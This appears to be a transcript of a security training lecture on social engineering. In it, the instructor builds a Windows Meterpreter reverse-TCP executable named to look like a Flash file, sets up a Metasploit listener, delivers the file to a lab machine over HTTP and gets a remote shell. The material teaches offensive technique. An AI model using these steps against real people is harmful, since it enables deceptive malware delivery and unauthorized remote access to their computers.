Now in this session we will discuss about social engineering attack. In this session we will use social engineering as an attack vector to compromise target system. Social engineering is the term used for a broad range of malicious activities accomplished through human interactions. It uses psychological manipulation to trick user into making security mistakes or giving away sensitive information. The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted access, building or getting the users to installing backdoor software. Social engineering technique involves email, website, Java applet, HID device. Sometimes malware are bind with other legitimate file like image, PDF, etc. of the victim interest. So, there are variety of technique used for social engineering attack. Best tool for social engineering attack is SE Toolkit. We will cover SE Toolkit in next session. In this session, I will show something I built from scratch. Now, I am going to convert the payload into an executable and then using social engineering execute into the target system and compromise it. We will use the tool MSF Venom, which is a companion script with Metasploit. So, run MSF Venom without any argument, you will get a list how to use it. So, let us check MSF Venom. So, see the help is here and you can check how to use MSF Venom. To check the list of all payload, we can use the command MSF Venom -L. So, all the list of payload. Now, see here is the list of all the payloads available in MSF Venom. Now, see Now, see there is a payload with the name Windows/meterpreter/reverse_TCP. Now, we are going to use this particular payload and create the executable, and by using this payload we try to establish a reverse connection from target machine to attacker machine. So, first see how to create the binaries or executable using this particular payload. So, now I am using MSF Venom, then -p specify the payload name. So, now the payload name is Windows/meterpreter/reverse_TCP. Now, we need to set the L host. L host means basically the IP address of the attacker machine, that means IP address of the Kali machine, that is 10.35.1.198. Because we are basically going to establish the reverse connection, That means whenever we execute this executable in the target machine, it establishes the connection with the host IP address 10.35.1.198, and we can also set the L port. So, L port I am using here 443. Now, -F specify the file format. I am going to create the exe file. Now, put the location where you want to store this executable file. I am going to store this executable file in root under my file directory, and the file name is maybe flash8.exe. Now, hit enter. Now, it is created. Now, check the folder. Now, see, it is already created. Now, our main aim is execute this exe file into the target machine using any kind of social engineering attack, like maybe through email, maybe by website, or any other social engineering attack vector. Now, in attacker machine, we also need to open the handler which can able to listen the connection which is coming from the target machine. That means, where we execute this file. So, to open the handler, we need to open Metasploit framework. So, by typing MSF console, I am opening the Metasploit framework. Okay. Now, we need to open the handler. So, the command is use exploits/multi/handler. Now, we need to set the payload. So, we use the payload windows/meterpreter/reverse_TCP. Now, by using the show options command, we can check all the option we need to set under this particular payload. So, we need to set L host. So, use the command set, then L host is 10.35.1.198. I am also going to change L port. So, use the command set L port is 443. Now, use the command exploit to really open the handler, and which can able to listen the connection coming from the target machine. Exploit. So, now the reverse TCP handler is on in port 443. Now, somehow we need to execute the exe file in the target machine. So, to do that, we need to use any kind of social engineering method. For the time being, I am simply use a HTTP server to execute the executable file in the victim machine. So, I am opening a simple HTTP server on port 8000. Now, see, this is the executable which we already created. Now, I am executing this file in the target machine. And go back to the attacker machine, where we open the listener and see we got the session, and check the system information. Wow! Now, we are inside the Windows 7 machine. Now, from the MeterPreter session, using the shell command, we can directly go inside the target machine. Now, see, now we are inside the desktop of the target machine. Now, suppose I want to create some directory in the desktop. So, using the command mkdir, I am going to create a directory with the name Kali. Now, see, already a file is created in the desktop of the target machine. Now, suppose I want to delete this particular directory. And see, it is already deleted. Wow! Now, to go back to the MeterPreter session, we can use the command exit. Now, if you use the exit command in MeterPreter session, it will basically close the session with the target machine.